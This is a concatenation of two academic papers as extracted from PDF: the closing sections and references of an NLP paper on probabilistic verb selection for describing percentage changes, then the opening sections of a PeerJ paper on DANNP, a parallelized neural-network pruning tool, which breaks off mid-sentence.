(“wheat price” vs “inflation”). • “According to World Bank figures, wheat prices have surged up by 181 percent in the past three years to February 2008.” • “While inflation has surged to almost 8% in 2008, it is projected by the Commission to fall in 2009.” Furthermore, the significance of a percentage change often depends on the domain, and consequently, so does the most appropriate verb to describe a per- centage change. For example, a 10% increase in stock price is interesting, while a 10% increase in body temperature is life-threatening. It is, of course, possible to incorporate the subject information into our probabilistic model by extending Eq. (2) to P(w|x,s) = P(w,s)P(x|w,s)/P(x,s) where s is the subject word in the triple. On one hand, this should make the model more effective, for the rea- sons explained above. On the other hand, this would require a lot more data for reliable estimation of the model parameters, which is one of the reasons why we leave it for future work. Language Modeling: Thanks to its probabilistic nature, our proposed model for verb selection could be seamlessly plugged into an n-gram statistical lan- guage model (Jurafsky and Martin, 2009), e.g., for the MSR Sentence Completion Challenge6. This might be able to reduce the language model’s perplex- ity, as the probability of 〈subject, verb, percentage〉 triples could be calculated more precisely. Hierarchical Modeling: The choice of verb to de- scribe a particular percentage change could be af- fected by the style of the author, the topic of the document, and other contextual factors. To take those dimensions into account and build a finer prob- abilistic model for verb selection, we could embrace Bayesian hierarchical modeling (Gelman et al., 2013; Kruschke, 2014) which, for example, could let each author’s model borrow the “statistical power” from other authors’. Psychology: There exist a lot of studies in psy- chology on how people interpret probabilities and risks (Reagan et al., 1989; Berry et al., 2004). They could provide useful insights for further enhancing our verb selection method. 7 Conclusions The major research contribution of this paper is a probabilistic model that can select appropriate verbs 6https://goo.gl/yyKBYa 524 to express percentage changes with different direc- tions and magnitudes. This model is not relying on hard-wired heuristics, but learned from training ex- amples (in the form of verb-percentage pairs) that are extracted from large-scale real-world news corpora. The choices of verbs made by the proposed model are found to match our intuitions about how differ- ent verbs are collocated with percentage changes of different sizes. The real challenge here is to strike the right balance between accuracy and diversity, which can be realized via smoothing. Our experi- ments have confirmed that the proposed model can capture human authors’ pattern of usage around verbs better than the existing method currently employed by Thomson Reuters EikonTM. We hope that this probabilistic model for verb selection could help data- to-text NLG systems achieve greater variation and naturalness. Acknowledgments The research is partly funded by the National Key R&D Program of China (ID: 2017YFC0803700) and the NSFC grant (No. 61532021). The Titan X Pascal GPU used for our experiments was kindly donated by the NVIDIA Corporation. Prof Xuanjing Huang (Fudan) has helped with the datasets. We thank the anonymous reviewers and the ac- tion editor for their constructive and helpful com- ments. We also gratefully acknowledge the support of Geek.AI for this work. References Lada A Adamic. 2000. Zipf, power-laws, and Pareto — A ranking tutorial. Technical report, HP Labs. Gabor Angeli, Percy Liang, and Dan Klein. 2010. A simple domain-independent probabilistic approach to generation. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 502–512. Anja Belz and Eric Kow. 2009. System building cost vs. output quality in data-to-text generation. In Pro- ceedings of the 12th European Workshop on Natural Language Generation (ENLG), pages 16–24. Anja Belz. 2008. Automatic generation of weather fore- cast texts using comprehensive probabilistic generation- space models. Natural Language Engineering (NLE), 14(04):431–455. Dianne Berry, Theo Raynor, Peter Knapp, and Elisabetta Bersellini. 2004. Over the counter medicines and the need for immediate action: A further evaluation of Eu- ropean Commission recommended wordings for com- municating risk. Patient Education and Counseling, 53(2):129–134. Steven Bird, Ewan Klein, and Edward Loper. 2009. Natu- ral Language Processing with Python: Analyzing Text with the Natural Language Toolkit. O’Reilly Media. Sarah Boyd. 1998. TREND: A system for generating intelligent descriptions of time series data. In Pro- ceedings of the 2nd IEEE International Conference on Intelligent Processing Systems (ICIPS). Eugene Charniak, Don Blaheta, Niyu Ge, Keith Hall, John Hale, and Mark Johnson. 2000. BLLIP 1987-89 WSJ Corpus Release 1 LDC2000T43. Web Download. Philadelphia: Linguistic Data Consortium. Andrew Gelman, John Carlin, Hal Stern, David Dunson, Aki Vehtari, and Donald Rubin. 2013. Bayesian Data Analysis. CRC, 3rd edition. Eli Goldberg, Norbert Driedger, and Richard I. Kittredge. 1994. Using natural-language processing to produce weather forecasts. IEEE Expert, 9(2):45–53. Ian Goodfellow, Yoshua Bengio, and Aaron Courville. 2016. Deep Learning. MIT Press. Richard H.R. Hahnloser, Rahul Sarpeshkar, Misha A. Ma- howald, Rodney J. Douglas, and H. Sebastian Seung. 2000. Digital selection and analogue amplification coexist in a cortex-inspired silicon circuit. Nature, 405(6789):947–951. Trevor Hastie, Robert Tibshirani, and Jerome Friedman. 2009. The Elements of Statistical Learning: Data Min- ing, Inference, and Prediction. Springer, 2nd edition. Frederick Jelinek and Robert Mercer, 1980. Interpolated Estimation of Markov Source Parameters from Sparse Data, pages 381–402. North-Holland Publishing. Daniel Jurafsky and James H. Martin. 2009. Speech and Language Processing: An Introduction to Natural Language Processing, Computational Linguistics and Speech Recognition. Prentice Hall, 2nd edition. Dave S Kerby. 2014. The simple difference formula: An approach to teaching nonparametric correlation. Com- prehensive Psychology, 3(1). Diederik P. Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. arXiv preprint arXiv:1412.6980. Suneel Kumar Kingrani, Mark Levene, and Dell Zhang. 2015. Diversity analysis of web search results. In Pro- ceedings of the Annual International ACM Web Science conference (WebSci). Ioannis Konstas and Mirella Lapata. 2013. A global model for concept-to-text generation. Journal of Artifi- cial Intelligence Research (JAIR), 48:305–346. 525 Manfred Krifka. 2007. Approximate interpretations of number words: A case for strategic communication. In Cognitive Foundations of Interpretation, pages 111– 126. John K Kruschke. 2014. Doing Bayesian Data Analysis: A Tutorial with R, JAGS, and Stan. Academic Press, 2nd edition. Anne E. Magurran. 1988. Ecological Diversity and Its Measurement. Princeton University Press. Christopher D. Manning, Prabhakar Raghavan, and Hin- rich Schütze. 2008. Introduction to Information Re- trieval. Cambridge University Press. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Rose Finkel, Steven Bethard, and David Mc- Closky. 2014. The Stanford CoreNLP natural language processing toolkit. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguis- tics (ACL), System Demonstrations, pages 55–60. Hongyuan Mei, Mohit Bansal, and Matthew R. Walter. 2016. What to talk about and how? Selective gen- eration using LSTMs with coarse-to-fine alignment. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL- HLT), pages 720–730. Chris Mellish and Robert Dale. 1998. Evaluation in the context of natural language generation. Computer Speech & Language, 12(4):349–373. Priscilla Moraes, Kathleen McCoy, and Sandra Carberry. 2014. Adapting graph summaries to the users’ reading levels. In Proceedings of the 8th International Natural Language Generation Conference (INLG), pages 64– 73. Mark E. J. Newman. 2005. Power laws, Pareto distribu- tions and Zipf’s law. Contemporary Physics, 46(5):323– 351. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: A method for automatic evalu- ation of machine translation. In Proceedings of the 40th Annual Meeting of the Association for Computational Linguistics (ACL), pages 311–318. Vassilis Plachouras, Charese Smiley, Hiroko Bretz, Ola Taylor, Jochen L. Leidner, Dezhao Song, and Frank Schilder. 2016. Interacting with financial data us- ing natural language. In Proceedings of the 39th In- ternational ACM SIGIR Conference on Research and Development in Information Retrieval (SIGIR), pages 1121–1124. David MW Powers. 1998. Applications and explanations of Zipf’s law. In Proceedings of the Joint Conferences on New Methods in Language Processing and Computa- tional Natural Language Learning (NeMLaP/CoNLL), pages 151–160. Dragomir R. Radev, Hong Qi, Harris Wu, and Weiguo Fan. 2002. Evaluating web-based question answer- ing systems. In Proceedings of the 3rd International Conference on Language Resources and Evaluation (LREC). Alejandro Ramos-Soto, Alberto Bugarı́n, Senén Barro, and Juan Taboada. 2013. Automatic generation of textual short-term weather forecasts on real prediction data. In Proceedings of the 10th International Confer- ence on Flexible Query Answering Systems (FQAS), pages 269–280. Josef Raviv. 1967. Decision making in Markov chains applied to the problem of pattern recognition. IEEE Transactions on Information Theory, 13(4):536–551. Robert T. Reagan, Frederick Mosteller, and Cleo Youtz. 1989. Quantitative meanings of verbal probability ex- pressions. Journal of Applied Psychology, 74(3):433. Ehud Reiter and Anja Belz. 2009. An investigation into the validity of some metrics for automatically evalu- ating natural language generation systems. Computa- tional Linguistics, 35(4):529–558. Ehud Reiter, Somayajulu Sripada, Jim Hunter, Jin Yu, and Ian Davy. 2005. Choosing words in computer- generated weather forecasts. Artificial Intelligence, 167(1-2):137–169. Ehud Reiter. 2007. An architecture for data-to-text sys- tems. In Proceedings of the 11th European Workshop on Natural Language Generation (ENLG), pages 97– 104. Stuart Russell and Peter Norvig. 2009. Artificial Intelli- gence: A Modern Approach. Prentice Hall, 3rd edition. David W Scott. 2015. Multivariate Density Estimation: Theory, Practice, and Visualization. John Wiley & Sons. Claude E. Shannon. 1948. A mathematical theory of com- munication. Bell System Technical Journal, 27:623– 656. Heung-Yeung Shum, Xiaodong He, and Di Li. 2018. From Eliza to XiaoIce: Challenges and opportunities with social chatbots. arXiv preprint arXiv:1801.01957. Edward H Simpson. 1949. Measurement of diversity. Nature. Charese Smiley, Vassilis Plachouras, Frank Schilder, Hi- roko Bretz, Jochen L. Leidner, and Dezhao Song. 2016. When to plummet and when to soar: Corpus based verb selection for natural language generation. In Pro- ceedings of the 9th International Natural Language Generation Conference (INLG), pages 36–39. Somayajulu Sripada, Neil Burnett, Ross Turner, John Mastin, and Dave Evans. 2014. A case study: NLG meeting weather industry demand for quality and quan- tity of textual weather forecasts. In Proceedings of the 8th International Natural Language Generation Con- ference (INLG), pages 1–5. 526 Ellen M. Voorhees. 1999. The TREC-8 question an- swering track report. In Proceedings of the 8th Text REtrieval Conference (TREC), pages 77–82. Dennis Wackerly, William Mendenhall, and Richard Scheaffer. 2007. Mathematical Statistics with Applica- tions. Nelson Education. Frank Wilcoxon. 1945. Individual comparisons by rank- ing methods. Biometrics Bulletin, 1(6):80–83. Alex Wright. 2015. Algorithmic authors. Communica- tions of the ACM (CACM), 58(11):12–14. Chengxiang Zhai and John Lafferty. 2004. A study of smoothing methods for language models applied to in- formation retrieval. ACM Transactions on Information Systems (TOIS), 22(2):179–214. 527 528 work_y6i7l3737zhnxb6nkrgyvnvbou ---- Submitted 6 July 2017 Accepted 15 October 2017 Published 6 November 2017 Corresponding author Vladimir B. Bajic, vladimir.bajic@kaust.edu.sa Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.137 Copyright 2017 Alshahrani et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS DANNP: an efficient artificial neural network pruning tool Mona Alshahrani1, Othman Soufan1, Arturo Magana-Mora1,2 and Vladimir B. Bajic1 1 Computational Bioscience Research Center (CBRC), King Abdullah University of Science and Technology (KAUST), Thuwal, Saudi Arabia 2 Computational Bio Big-Data Open Innovation Laboratory (CBBD-OIL), National Institute of Advanced Industrial Science and Technology (AIST), Tokyo, Japan ABSTRACT Background. Artificial neural networks (ANNs) are a robust class of machine learning models and are a frequent choice for solving classification problems. However, deter- mining the structure of the ANNs is not trivial as a large number of weights (connection links) may lead to overfitting the training data. Although several ANN pruning algorithms have been proposed for the simplification of ANNs, these algorithms are not able to efficiently cope with intricate ANN structures required for complex classification problems. Methods. We developed DANNP, a web-based tool, that implements parallelized versions of several ANN pruning algorithms. The DANNP tool uses a modified version of the Fast Compressed Neural Network software implemented in C++ to considerably enhance the running time of the ANN pruning algorithms we implemented. In addition to the performance evaluation of the pruned ANNs, we systematically compared the set of features that remained in the pruned ANN with those obtained by different state- of-the-art feature selection (FS) methods. Results. Although the ANN pruning algorithms are not entirely parallelizable, DANNP was able to speed up the ANN pruning up to eight times on a 32-core machine, compared to the serial implementations. To assess the impact of the ANN pruning by DANNP tool, we used 16 datasets from different domains. In eight out of the 16 datasets, DANNP significantly reduced the number of weights by 70%–99%, while maintaining a competitive or better model performance compared to the unpruned ANN. Finally, we used a naïve Bayes classifier derived with the features selected as a byproduct of the ANN pruning and demonstrated that its accuracy is comparable to those obtained by the classifiers trained with the features selected by several state-of-the-art FS methods. The FS ranking methodology proposed in this study allows the users to identify the most discriminant features of the problem at hand. To the best of our knowledge, DANNP (publicly available at www.cbrc.kaust.edu.sa/dannp) is the only available and on-line accessible tool that provides multiple parallelized ANN pruning options. Datasets and DANNP code can be obtained at www.cbrc.kaust.edu.sa/dannp/data.php and https://doi.org/10.5281/zenodo.1001086. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning Keywords Artificial neural networks, Pruning, Parallelization, Feature selection, Classification problems, Machine learning, Artificial inteligence How to cite this article Alshahrani et al. (2017), DANNP: an efficient artificial neural network pruning tool. PeerJ Comput. Sci. 3:e137; DOI 10.7717/peerj-cs.137 https://peerj.com mailto:vladimir.bajic@kaust.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.137 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ www.cbrc.kaust.edu.sa/dannp www.cbrc.kaust.edu.sa/dannp/data.php https://doi.org/10.5281/zenodo.1001086 http://dx.doi.org/10.7717/peerj-cs.137 INTRODUCTION Artificial neural networks (ANNs) can arbitrarily well approximate non-linear target functions (Bishop, 2006). An extensive empirical study (Fernandez-Delgado, Cernadas & Barro, 2014) demonstrated that a voting ensemble of ANNs achieved the best average performance over the UCI machine learning repository on two-class classification problems. The ANNs have been extensively used for solving different classification problems, see, for example, (Almeida, 2002; Ashoor et al., 2011; Bajic et al., 2002; Bajic et al., 2004; Bajic & Werner, 2005; Basheer & Hajmeer, 2000; Dias, Antunes & Mota, 2004; Gan, Chen & Huang, 2016; Gardnera & Dorlinga, 1998; Hatzigeorgiou, 2002; Hernández- Serna & Jiménez-Segura, 2014; Jayne, Iliadis & Mladenov, 2016; Kalkatawi et al., 2013; Li et al., 2015; Magana-Mora et al., 2013; Magana-Mora & Bajic, 2017; Magana-Mora, Kalkatawi & Bajic, 2017; Meireles, Almeida & Simoes, 2003; Wang et al., 2017). The ANNs are universal approximators, given a sufficiently rich model architecture and weights (Hornik, Stinchcombe & White, 1989), and may consist of multiple hidden layers. However, the multilayer ANN representation rapidly increases model complexity due to the large number of tunable weights. Moreover, the high number of weights may amplify irrelevant characteristics or noise that may be present in the training data and lead to a poor model generalization for unseen data. This problem is referred to as overfitting of the training data, and different methods have been proposed to address this undesirable effect. These methods may be broadly divided into three groups: (1) ANN regularization (Ng, 2004; Nowlan & Hinton, 1992), (2) early stopping (Prechelt, 2012), and (3) ANN pruning (Burden & Winkler, 2009; Reed, 1993; Srivastava et al., 2014; Wan et al., 2013). Here, we focus on the ANN pruning as it not only simplifies the model structure but also results in fewer computations and smaller storage requirements for the pruned network. In addition, as a side benefit, the ANN pruning may keep the most useful features and rank their relevance based on their predictive capabilities. Although there are different robust methods for performing feature selection (FS) and feature ranking, selection of the FS method and the parameters is not trivial. Refer to Soufan et al. (2015b) for more details on FS. ANN pruning algorithms may be divided into two categories. The simplest, magnitude- based pruning (MP) methods consist of removing weights with the lowest magnitudes. After a certain number of weights are deleted, the ANN is retrained. While this approach may work for some problems, removing weights with the smallest magnitudes does not always produce the smallest increase of the error function (Hassibi, Stork & Wolff, 1993). More sophisticated, the second category of pruning algorithms measures the sensitivity of the second-order information of the error function with respect to the weights. As a result, the weight that least increases the error function is removed (Hassibi, Stork & Wolff, 1993; Karnin, 1990; Mozer & Smolensky, 1989). These approaches usually result in more accurate models as they take advantage of the Hessian matrix (referred to as H matrix, hereafter) to account for the additional curvature information of the error function (Hassibi, Stork & Wolff, 1993). In this category of pruning algorithms, optimal brain damage (OBD) (LeCun et al., 1989) uses the second-order derivative of the error function relative to the network weights. The OBD avoids the complexity of computing the H matrix by assuming diagonal H-matrix. Nevertheless, this assumption is not true in many cases leading to the removal of Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 2/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 the wrong weights (Hassibi, Stork & Wolff, 1993), and therefore, affects the accuracy of the resulting models. In contrast to OBD, the optimal brain surgeon (OBS) algorithm (Hassibi, Stork & Wolff, 1993) does not assume a diagonal H matrix. Additionally, OBS provides an approximation of the inverse H matrix (H- inverse) and is shown to produce more robust models than MP and OBD algorithms (Hassibi, Stork & Wolff, 1993). Refer to Article S1 for further details about these methods. However, the pruning of ANNs is a computationally expensive task that often limits its application to real-life problems where datasets may contain a large number of samples and data features. Therefore, speeding up the pruning process is essential for many practical applications. Although pruning algorithms of the OBS types are not entirely parallelizable, certain computationally intensive parts are, which lead to a significant speedup on multicore processors. For the reasons mentioned above, this study aims to develop a user-friendly tool with several implemented parallelized ANN pruning algorithms able to cope with complex or medium size data. For this, we developed DANNP tool, which implements several parallelized variants of ANN pruning algorithms. We demonstrated the efficiency and utility of the implemented algorithms in the DANNP tool on several small to medium size benchmark datasets. Moreover, as a useful by-product of the ANN pruning, the pruning process selects the most useful data features for the problem in hand. The application of the FS methods to find a subset of features to train a classification model is often used to derive simpler and faster models. Although in many cases the reduced number of features may result in improved performance, the feature subset is not always capable of describing the data accurately and may frequently result in models with inferior performance. In this study, we demonstrate that the selected features result in similar or improved classification performance in comparison with several state-of-the-art FS methods on the considered datasets. MATERIALS AND METHODS In this section, we first define the Hessian-based pruning algorithm and the implemented modifications for the parallelization of the code, followed by the details on the FS methods. Finally, we describe the datasets and model evaluation procedure to assess the performance of the DANNP tool. Hessian-based pruning formulation and DANNP parallelization The OBS uses the second-order information of the error function and measures the saliency of the ANN weights. The algorithm evaluates the saliency by the effect on the error function when the ANN weight vector w is perturbed. Therefore, the algorithm aims to determine the weights that cause the least increase of the error function E. The error function may be approximated by a Taylor series as follows (Hassibi, Stork & Wolff, 1993): E(w) ∼=E(w+1w)=E(w)+E′(w) 1w+ 1 2 E ′′ (w) 1w2+··· 1E =E(w+1w )−E(w)=E′(w) 1w+ 1 2 E ′′ (w) 1w2+··· 1E = E′(w) 1w+ 1 2 1wT H 1w+··· (1) Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 3/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supp-1 http://dx.doi.org/10.7717/peerj-cs.137 where E′(w) is the first-order derivative of E with respect to w (the gradients vector); H is the H matrix determined as H =∂2E/∂w2, i.e., as the second-order derivative of E with respect to w. The approximation of the H-inverse is obtained via an iterative procedure as follows (Hassibi, Stork & Wolff, 1993): (Hm+1)−1=(Hm)−1− (Hm)−1 ·gm+1 1w ·g [m+1]T 1w ·(H m)−1 p+g[m+1] T 1w ·(H m)−1 ·g[m+1] 1w (2) where ( H0 )−1 =α−1I, I is the identity matrix and α is a small scalar; gm+1 1w is the gradient vector from the backpropagation calculations in iteration m+1, where m denotes the number of iterations; p is a scalar that represents the number of training samples. The H matrix is of size v2, where v is the total number of weights in the network. The code optimization and parallelization of the pruning methods implemented in the DANNP tool are achieved by (1) implementation of a faster version of the algorithm for the approximation of the H-inverse, and (2) reducing the number of evaluations of the H-inverse approximation. To address the faster algorithm for approximation of the H-inverse, we modified the implementation of the calculation of the H-inverse using, where applicable, optimized BLAS routines (Blackford et al., 2002) and modified the code to reduce the overhead by computing repeated terms only once. However, since the approximation of the H-inverse is based on an iterative process (Eq. (2)), this inherent limitation hinders full parallel scaling. Algorithm 1 describes the implementation of the parallel version of Eq. (2) based on the BLAS routines. To address the reduction of the number of evaluations of the H-inverse approximation, we implemented multiple-weights OBS (MWOBS-parallel), which removes multiple weights in each pruning iteration while using the optimization described in Algorithm 1. In contrast to OBS where the H-inverse has to be computed for removing a single weight, in MWOBS-parallel this computation is performed only once for removing n weights, where the number of n weights is set to 1% of the weights in the initial ANN. This approach significantly reduces the running time and frequently achieves comparable or better performance relative to the serial OBS or the fully connected ANNs. ANN model The ANN models were derived by using a modified version of the Fast Compressed Neural Network software (Klima, 2015). This software is a modular and fast C++ implementation of ANN algorithms. We modified the software to use optimized BLAS to replace the serial approximation of the H-inverse update routines (using Eq. (2)). In this study, we considered ANN with a single layer as it has been demonstrated that one hidden layer, with a sufficient number of nodes and a sigmoid activation function, is enough to learn complex data patterns (Cybenko, 1989; Hornik, Stinchcombe & White, 1989). However, our solutions apply to multilayer ANN architecture. Moreover, the resilient backpropagation algorithm (Riedmiller, 1994) was used to train the ANN as it frequently achieves faster convergence over the conventional backpropagation algorithm. Finally, we considered a different number of nodes in the hidden layer for comparing the pruning effects of different algorithms. The total number of weights correlates with the Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 4/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 Algorithm 1 Hessian Inverse Approximation 1: Compute H−1 by approximation 2: Initiate H−10 =α −1I 3: For each training sample m 4: For each output unit k 5: Update H−1 by using Eq. (2) 6: Compute Hgwx1=H −1 ∗g 7: Compute the denominator scalar d =p+gT ∗Hgwx1 8: Compute the numerator and update using Optimized BLAS routines H−1m+1=H −1 m −(Hgwx1⊗(Hgwx1) T/d) 9: End For 10: End For Note: operators∗ and⊗ refer to the matrix vector product and the outer product of two vectors, respectively. ANN complexity and is calculated as follows: NumWeights=NumInputs×NumHNodes+NumHNodes×NumClasses (3) where NumInputs, NumHNodes, and NumClasses refer to the number of input features, the number of nodes in the hidden layer, and the number of classes in the classification problem, respectively. ANN pruning solutions implemented in DANNP tool The DANNP tool implements the parallel versions of three OBS-based approaches to ANN pruning using the approximation of the H-inverse. These generate simpler structures and improve the model generalization with the least sacrifice in accuracy, compared to MP and OBD. The implemented algorithms are OBS-parallel, MWOBS-parallel, and unit-based OBS (UOBS-parallel), which are described in the following subsections. However, we also provide the simple MP algorithm for the sake of comparison. We did not compare against OBD algorithm as it has been shown that assuming a diagonal H matrix leads to the removal of wrong weights and produces inferior models (Hassibi, Stork & Wolff, 1993). In our implementation, pruning algorithms continue to remove weights as long as the increase in the training mean-squared error (MSE) is below 1% or stops when it reaches the pre-specified number of iterations. OBS-parallel The OBS algorithm aims to find the weight that when eliminated, it causes overall the least increase in the error function 1Ei calculated according to 1Ei= 1 2 w2i[ H−1 ] i (4) where wi refers to the i-th weight that is to be removed. In this algorithm, the calculation of the H-inverse is required to remove a single weight per pruning iteration (Fig. 1A). Finally, the remaining weights in the network are updated to account for the removed weight (see Article S1 for further details). Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 5/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supp-1 http://dx.doi.org/10.7717/peerj-cs.137 Figure 1 Pruning variants of OBS. (A) OBS algorithm: a single weight (dashed line) is removed per pruning iteration. (B) MWOBS algorithm: multiple weights (dashed lines) are removed per pruning itera- tion. (C) UOBS algorithm: a node and its incoming/outgoing weights are removed in a pruning iteration. Full-size DOI: 10.7717/peerjcs.137/fig-1 MWOBS-parallel In contrast to OBS, the MWOBS algorithm may remove multiple weights in a single pruning iteration (Fig. 1B). To achieve this, the error increase 1Ei is evaluated individually for every weight in the network by using Eq. (4). Weights are then sorted according to the increase of the associated errors and the n weights with the smallest error increase are selected for pruning, where n is set to 1% of the weighs in the initial ANN. This simplification is made to avoid evaluating every combination of weights as described in the general formulation of pruning n weights using OBS in Stahlberger & Riedmiller (1997). UOBS-parallel The UOBS variant described in Stahlberger & Riedmiller (1997) defines a heuristic that leads to removal of all outgoing weights of a particular node, thus reducing the overall number of considered nodes in the network (Fig. 1C). We implemented this variant for the purpose of completeness, and integrated the optimized parallel approximation of the H-inverse in this approach, as indicated in Algorithm 1. Feature selection through ANN pruning and comparison settings Due to the simplification of the ANN structure through pruning, it is possible that some of the input data features are not used in the pruned ANN. This amounts to the FS in the wrapper setting. Figure 1B shows an example of a pruned ANN where input feature x2 is discarded (having no connecting weights from the input to the hidden layer). We ranked, in descending order, the remaining features (x1 and x3, from the example) by considering, for each input feature, the sum of the absolute values of all outgoing weights. Similar to the comprehensive analysis of FS methods performed in Soufan et al. (2015b), we analyzed the pruning effects of the MWOBS-parallel variant on the features and compared it with the state-of-the-art methods for FS. We considered seven different FS methods from the FEAST MATLAB toolbox (Brown et al., 2012), namely, conditional mutual information maximization (CMIM) (Fleuret, 2004), correlation-based FS (Hall, 1999), joint mutual information (JMI) (Yang & Moody, 1999), maximum relevance minimum redundancy (mRMR) (Peng, Long & Ding, 2005), RELIEF (Kira & Rendell, Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 6/22 https://peerj.com https://doi.org/10.7717/peerjcs.137/fig-1 http://dx.doi.org/10.7717/peerj-cs.137 Table 1 Datasets summary. Datasets Number of features Number of samples Number of classes Breast cancer (BC) 9 682 2 Heart disease (HD) 13 297 2 Wisconsin diag. breast cancer (WDBC) 30 569 2 Promoters prediction (PP) 57 106 2 Cardiac arrhythmia (CA) 277 442 2 Synthetic madelon (SM) 500 2,000 2 Prostate cancer (PC) 2,135 102 2 TF-TF combination (TFTF) 1,062 674 2 AID886 compounds (AID) 918 10,471 2 Default credit cards (DCC) 24 12,000 2 Epileptic seizure recognition (ESR) 178 11,500 2 LSVT voice rehabilitation (LSVT) 310 127 2 Urban land cover (ULC) 147 168 9 Sensorless drive diagnosis (SDD) 48 48,487 11 Human activity recognition (HAR) 561 10,299 6 MNIST digits (MD) 748 59,999 10 1992), T-test (Guyon & Elisseeff, 2003), and receiver operating characteristic curve (ROC) (Guyon & Elisseeff, 2003). Refer to Article S2 for more details on the FS methods. We used MWOBS-parallel for determining the feature subsets, as it can cope with complex datasets and ANN structures requiring short running times. Since the selected features are the result of the ANN pruning, using an ANN to assess the performance of the feature subset may produce biased results. Thus, we used a naïve Bayes classifier to produce unbiased results with the so selected features. Datasets We measured the performance of the implemented ANN pruning algorithms, on 15 datasets from different domains and one synthetic dataset, all with a different number of features and number of samples. The selected datasets reflect some of the data properties present in real applications, i.e., small or medium size datasets represented by both small and large number of features. From these datasets, seven are taken from the UCI machine learning repository (Lichman, 2013), and nine are obtained from recent studies (Anguita et al., 2013; Johnson & Xie, 2013; Schmeier, Jankovic & Bajic, 2011; Singh et al., 2002; Soufan et al., 2015a; Tsanas et al., 2014; Wang et al., 2016; Yeh & Lien, 2009). Table 1 shows the summary information for these datasets. Data processing and model evaluation Feature values for all considered datasets were normalized to have values within the range of [−1, 1]. We used the k-fold cross-validation technique to estimate the performance of ANNs. k-fold cross-validation requires dividing the whole dataset into k subsets of similar size. We train the ANN model on k−1 subsets and test it on the remaining subset. The Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 7/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supp-2 http://dx.doi.org/10.7717/peerj-cs.137 Table 2 Statistical performance measures. TP, TN , FP and FN denote true positive, true negative, false positive and false negative predictions, respectively. For MSE, m is the number of samples, y is the ANN output value, and ti is the target value for the i-th sample. Statistical measure Equation Accuracy TP+TNTP+TN+FP+FN Sensitivity TPTP+FN Specificity TNTN+FP GM √ Sensitivity×Specificity MSE 1m ∑m i=1(y−ti) 2 procedure repeats for each of the subsets and performance achieved is given as the average across all subsets. In this study, we used k=10. We used several statistical measures to evaluate the k-fold cross-validation performance. These metrics are accuracy, sensitivity, specificity, geometric mean (GM), and mean squared error (MSE). Table 2 defines the considered statistical performance metrics. In addition to these measures, Table S2 shows the results using Cohen’s kappa coefficient, recall, precision and F1 score. To evaluate the utility of the features obtained from the ANN pruning, we compared the accuracy of a naïve Bayes classifier generated with these selected features to the accuracy of naïve Bayes classifiers generated with features selected by seven other FS methods. RESULTS AND DISCUSSION Here, we discuss in more details the speedup results obtained by the optimized parallel OBS variants, the accuracy resulting from ANN pruning and the effects on input features and weights. Finally, we present and discuss the results of the comprehensive comparisons for several state-of-the-art methods for FS, with FS and ranking based on ANN pruning. Three variants of the OBS pruning method using code parallelization are implemented in DANNP: (1) OBS-parallel, which eliminates only one weight per iteration; (2) MWOBS- parallel, which is an OBS variant that eliminates multiple weights per pruning iteration; and (3) unit-based OBS (UOBS-parallel), which eliminates a whole node (unit) and their connecting weights per iteration. For the sake of comparison, we also include the simple MP method. Running time speedup The speedup metric was used to quantify the running time reduction that we were able to achieve by parallelizing the calculation of the approximation of the H-inverse. The speedup is measured as follows: Speedup= Serial Execution Time Parallel Execution Time . (5) The performance gain obtained by parallelization is dictated by Amdahl’s law, which states that the optimization of the code is limited by the execution time of the code that cannot be parallelized (Amdahl, 1967). Specifically, for ANNs pruning, the most computationally demanding portion of the program is the calculation of the H-inverse. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 8/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supp-4 http://dx.doi.org/10.7717/peerj-cs.137 Figure 2 Speedup comparisons of OBS against OBS-parallel and MWOBS-parallel. (A–D) Speedup comparison for datasets where the OBS algorithm was completed within 48 h. The y-axis shows the log2 of the speedup calculated from Eq. (5). The x-axis shows the number of nodes in the ANN. Full-size DOI: 10.7717/peerjcs.137/fig-2 Therefore, we optimized the approximation of the H-inverse as described in Algorithm 1. Although MWOBS-parallel was able to cope with the datasets that are described by a relatively large number of samples and input features (i.e., CA, SM, PC, TFTF, AID, ESR, LSVT, ULC, HAR, DCC, SDD, and MD), the serial implementation of the OBS was not able to produce an output in an acceptable amount of time (<48 h). Therefore, Figs. 2A–2D show the speedup improvements of OBS-parallel and MWOBS-parallel over the non-parallel OBS in four datasets (BC, HD, WDCB, and PP). Table S1 shows the running time for the OBS-parallel, MWOBS-parallel, and UOBS-parallel for the remaining 12 datasets in which the OBS was unable to complete the execution within 48 h. Results in Fig. 2 and Table S1 show that OBS-parallel consistently reduced the running time compared to the standard OBS in the 16 considered datasets. The MWOBS-parallel achieved slower running times in the BC dataset with a small number of nodes in the hidden layer. This may be due to the possible time required to rank the weights based on the error increase (see the Methods section). However, this overhead is marginal and may be ignored when increasing the number of weights in the ANN (by increasing the number of nodes in the hidden layer or for datasets with more input features). The significant 